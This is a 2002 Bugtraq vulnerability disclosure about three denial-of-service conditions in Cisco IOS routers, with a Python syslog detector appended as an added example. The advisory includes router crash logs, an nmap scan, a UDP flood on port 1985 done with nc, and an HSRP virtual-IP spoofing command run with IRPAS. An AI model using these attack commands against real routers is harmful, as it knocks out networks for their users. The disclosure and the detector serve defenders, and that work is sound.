Three possible DoS attacks against some IOS versions.

From: Andrew Vladimirov (andrew@arhont.com)
Date: 06/05/02


Date: 5 Jun 2002 17:52:15 -0000
From: Andrew Vladimirov <andrew@arhont.com>
To: bugtraq@securityfocus.com



There are three possible unreported DoS conditions in certain versions of
IOS I could get my hands on.

1. When scanning all 65535 ports from a single host using nmap (full
connect/half connect/null/fin/ack/xmas) through a Cisco 2611 running
C2600-IO3-M, Version 12.1(6.5), the router crashes. The same applies to
scanning a class C network for a single open port. This was discovered
while auditing a corporate network.

Enabling or disabling CBAC, IDS, IP Accounting and applied extended
ACLs with logging does not affect the results, i.e. the problem persists.
 
Here comes the log:

OS (tm) C2600 Software (C2600-IO3-M), Version 12.1(6.5), MAINTENANCE
INTERIM SOFTWARE Copyright (c) 1986-2001 by cisco Systems, Inc.

Compiled Mon 29-Jan-01 19:20 by kellythw

hippo#ping cisco.com
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 198.133.219.25, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 168/170/173 ms

          < < < < < scan starts > > > > >

-Process= "IP Input", ipl= 0,
pid= 24 > -Traceback= 802CFCE4 802D19DC 807915D8 80791E04 80792598 8078B37C
803645E8 80363694 80363874 803639D0 802F0864
000010: 00:27:00: %SYS-2-MALLOCFAIL: Memory allocation of 5004 bytes
failed from 0x802CCB60, pool Processor, alignment 0
-Process= "IP Input", ipl= 0, pid= 24
-Traceback= 802CFCE4 802D2230 802CCB64 802CD350 80791488 807915F4 80791E04
80792598 8078B37C 803645E8 80363694 80363874 803639D0 802F0864
000011: 00:27:30: %SYS-2-MALLOCFAIL: Memory allocation of 5004 bytes
failed from 0x802CCB60, pool Processor, alignment 0
-Process= "IP Input", ipl= 0, pid= 24
-Traceback= 802CFCE4 802D2230 802CCB64 802CD350 80791488 807915F4 80791E04
80792598 8078B37C 803645E8 80363694 80363874 803639D0 802F0864
000012: 00:28:00: %SYS-2-MALLOCFAIL: Memory allocation of 5004 bytes
failed from 0x802CCB60, pool Processor, alignment 0
-Process= "IP Input", ipl= 0, pid= 24
-Traceback= 802CFCE4 802D2230 802CCB64 802CD350 80791488 807915F4 80791E04
80792598 8078B37C 803645E8 80363694 80363874 803639D0 802F0864

hippo#sh stacks 24

Process 24: IP Input
Stack segment 0x80DB0DB4 - 0x80DB3C94
FP: 0x80DB3C68, RA: 0x802DE6D8
FP: 0x80DB3C88, RA: 0x80363998
FP: 0x0, RA: 0x802F0864
    
hippo#sh run
hippo#

(no response)
  
root@boar:~# ping cisco.com
ping: unknown host cisco.com

The router does not respond. Connection is lost. CPU utilisation reaches
90 - 100 %. This bug is different from Cisco Bug ID CSCds07326i: here the
scan is going through the router and is not directed at it.

2. In certain versions of IOS UDP port 1985 is open when HSRP is not
running.

For example:

nmap -sU -vvv -O -p1985 192.168.1.254

Starting nmap V. 2.54BETA34 ( www.insecure.org/nmap/ )
Host (192.168.1.254) appears to be up ... good.
Initiating UDP Scan against (192.168.1.254)
The UDP Scan took 0 seconds to scan 1 ports.
Adding open port 1985/udp
Warning: OS detection will be MUCH less reliable because we did not find
at least 1 open and 1 closed TCP port.
Interesting ports on (192.168.1.254):
Port State Service
1985/udp open unknown
Remote OS guesses: Cisco IOS 11.1(7)-11.2(8.10), Cisco 4500-M running IOS
11.3(6) IP Plus, Cisco IOS 11.3 - 12.0(11), Cisco 1600/3640/7513 Router
(IOS 11.2(14)P), Cisco IOS v11.14(CA)/12.0.2aT1/v12.0.3T

However, a) tcpdump did not show any HSRP packets on the network;
         b) attempts to communicate with the router via HSRP using IRPAS
         (http://www.phenoelit.de/irpas/), successful when HSRP is
         running, failed to elicit any response.

Flooding 1985 with randomly sized UDP packets (cat /dev/urandom piped via
nc as UDP etc.) leads to CPU utilisation above 90% and eventually the
router crashes. Besides, the presence of this open port, where it should be
shut, assists in remote OS fingerprinting.
 
I have checked this with a number of system administrators I know; here
are the stats for udp port 1985 on their routers I've collected:
 
Open 1985: 12.1(8a)E5 Catalyst 6k R700, 11.2(23) C2500-I-L, 12.2(2)XI
(c827), 12.1(9) (C2500-I-L), 11.1(16) (c1000), 12.0(4)XM (c805), 12.2(2)T1
(C2600-IK8O3S);

Closed 1985: 12.0(3)T (C2500-I-L), 12.0(9) (c1600), 11.3(8)T1 (c2600),
12.0(3)T (c1720), 12.2(3) (c1720), 12.0(16) (C2500-I-L), 12.0(5)XQ
(C1700-NY-M);

In general, 12.0.x does not appear to have this potential problem.
Out of the routers checked, 50 % had UDP 1985 open. All routers with
1985 open were susceptible to DoS via 1985 UDP flood. None had HSRP
enabled and running.

 
3. While using IRPAS to test the "bug" above I have found the following.
The 12.1.x IOS implementation of HSRP fails to check the IP address of the
phantom router against the IP address of the interface on which HSRP is
running when the IP is advertised from the remote host using IRPAS. This
results in a conflict over the IP address for the interface, bypassing
normal sanity checks.

An obvious DoS condition is created, since the phantom router can be
remotely given an IP address of a local interface through which packets
enter the Active router, thus leading to a loop.

Example:

./hsrp -d 192.168.1.253 -v 192.168.1.254 -a cisco -g 1 -i eth0
where 192.168.1.253 - IP of a phantom router, 192.168.1.254 - IP of an
active router interface on which the standby 1 ip 192.168.1.253 command is
configured.

000059: 00:10:34: %STANDBY-6-STATECHANGE: Standby: 1: Ethernet0/1 state
Active -> Speak

000060: 00:10:34: %STANDBY-3-DIFFVIP1: Ethernet0/1 Group 1 active routers
virtual IP address 192.168.1.254 is different to the locally configured
address 192.168.1.253

May 6 18:28:26 192.168.1.254 324: 000317: 2d17h: %STANDBY-3-DUPADDR:
Duplicate address 192.168.1.254 on Ethernet0/1, sourced by 0050.043a.ff60

Nevertheless, the router goes into standby and 192.168.1.254 is taken as the
phantom's IP.

Interestingly, ./hsrp -d 192.168.1.253 -v 192.168.1.254 -a cisco -g 1 -i
eth0 -S 192.168.1.254 does not appear to have any effect and the packets
are dropped.

Setting a good password while enabling HSRP (something that should be done
anyway!) provides a temporary solution for this problem. Unfortunately, I
have seen networks running HSRP with the default password "cisco".

Vendor status: PSIRT was informed on 07.05.02

Acknowledgements to: the Arhont team, Phenoelit team/Fyodor for tools,
the rest of the open source community.

      Andrew A. Vladimirov
          aka _clf3_
          Arhont LTD
         www.arhont.com
        Security Manager
          CCNP / CCDP
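The three conditions above all leave traces in the router's own syslog: a burst of %SYS-2-MALLOCFAIL from the "IP Input" process for the first two, and %STANDBY-3-DIFFVIP1 / %STANDBY-3-DUPADDR for the HSRP virtual-IP conflict in the third. The following detector is an added example written for this page, not code from the author or from Cisco; it assumes IOS-format log lines (optionally prefixed by a remote-syslog header such as "May 6 18:28:26 192.168.1.254 324:"), and the sample input is constructed by modelling the lines quoted in the post, not captured from a real device. The threshold and window values are assumptions chosen to match the 30-second spacing seen above.

```python
"""Flag IOS syslog patterns matching the DoS conditions described in the post.

Added example; assumptions: IOS-style lines, uptime stamps of the form
'00:27:00:' or '2d17h:' immediately before the %FACILITY-SEV-MNEMONIC token.
"""
import re

# Constructed sample, modelled on the log lines quoted in the advisory.
SAMPLE_LOG = """\
000010: 00:27:00: %SYS-2-MALLOCFAIL: Memory allocation of 5004 bytes failed from 0x802CCB60, pool Processor, alignment 0
-Process= "IP Input", ipl= 0, pid= 24
-Traceback= 802CFCE4 802D2230 802CCB64 802CD350 80791488 807915F4 80791E04
000011: 00:27:30: %SYS-2-MALLOCFAIL: Memory allocation of 5004 bytes failed from 0x802CCB60, pool Processor, alignment 0
-Process= "IP Input", ipl= 0, pid= 24
000012: 00:28:00: %SYS-2-MALLOCFAIL: Memory allocation of 5004 bytes failed from 0x802CCB60, pool Processor, alignment 0
-Process= "IP Input", ipl= 0, pid= 24
000059: 00:10:34: %STANDBY-6-STATECHANGE: Standby: 1: Ethernet0/1 state Active -> Speak
000060: 00:10:34: %STANDBY-3-DIFFVIP1: Ethernet0/1 Group 1 active routers virtual IP address 192.168.1.254 is different to the locally configured address 192.168.1.253
May 6 18:28:26 192.168.1.254 324: 000317: 2d17h: %STANDBY-3-DUPADDR: Duplicate address 192.168.1.254 on Ethernet0/1, sourced by 0050.043a.ff60
000061: 00:10:40: %SYS-5-CONFIG_I: Configured from console by console
"""

MSG_RE = re.compile(r'%(?P<fac>[A-Z0-9_]+)-(?P<sev>\d)-(?P<mnem>[A-Z0-9_]+):\s*(?P<text>.*)$')
HMS_RE = re.compile(r'(\d{1,2}):(\d{2}):(\d{2}):\s+%')   # '00:27:00: %...'
DAYS_RE = re.compile(r'(\d+)d(\d+)h:\s+%')                # '2d17h: %...'

# Messages that indicate a conflicting HSRP virtual IP on the segment.
HSRP_CONFLICT = {'%STANDBY-3-DIFFVIP1', '%STANDBY-3-DUPADDR'}
DIFFVIP_RE = re.compile(r'virtual IP address (\S+) is different to the locally configured address (\S+)')
DUPADDR_RE = re.compile(r'Duplicate address (\S+) on (\S+), sourced by (\S+)')


def uptime_seconds(line):
    """Return the IOS uptime stamp in seconds, or None if the line carries none."""
    m = HMS_RE.search(line)
    if m:
        h, mi, s = (int(x) for x in m.groups())
        return h * 3600 + mi * 60 + s
    m = DAYS_RE.search(line)
    if m:
        d, h = (int(x) for x in m.groups())
        return d * 86400 + h * 3600
    return None


def parse_line(line):
    """Split one IOS log line into key/severity/text; None for continuation lines."""
    m = MSG_RE.search(line)
    if not m:
        return None
    return {
        'key': f"%{m['fac']}-{m['sev']}-{m['mnem']}",
        'severity': int(m['sev']),
        'text': m['text'].strip(),
        'uptime': uptime_seconds(line),
    }


def detect(lines, mallocfail_threshold=3, window_seconds=120):
    """Return findings: MALLOCFAIL bursts (memory exhaustion) and HSRP VIP conflicts."""
    findings = []
    malloc_times = []   # uptime stamps of recent MALLOCFAIL messages (sliding window)
    for rec in map(parse_line, lines):
        if rec is None:
            continue
        if rec['key'] == '%SYS-2-MALLOCFAIL' and rec['uptime'] is not None:
            malloc_times.append(rec['uptime'])
            while malloc_times and rec['uptime'] - malloc_times[0] > window_seconds:
                malloc_times.pop(0)
            if len(malloc_times) >= mallocfail_threshold:
                findings.append({'kind': 'memory-exhaustion', 'key': rec['key'],
                                 'count': len(malloc_times), 'detail': rec['text']})
                malloc_times.clear()   # one alert per burst, not one per message
        elif rec['key'] in HSRP_CONFLICT:
            finding = {'kind': 'hsrp-vip-conflict', 'key': rec['key'], 'detail': rec['text']}
            m = DIFFVIP_RE.search(rec['text'])
            if m:
                finding.update(advertised_vip=m[1], local_vip=m[2])
            m = DUPADDR_RE.search(rec['text'])
            if m:
                finding.update(address=m[1], interface=m[2], source_mac=m[3])
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for finding in detect(SAMPLE_LOG.splitlines()):
        print(finding)
```

On the sample this yields one memory-exhaustion finding (three MALLOCFAIL messages within 60 seconds, all from the same process) and two HSRP findings, the second of which carries the source MAC of the station that advertised the duplicate address, which is the piece an operator needs to trace the conflicting host on the segment. Feeding the output of `logging host` collection into this, alongside the HSRP authentication the post recommends, gives a defender both prevention and a signal.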


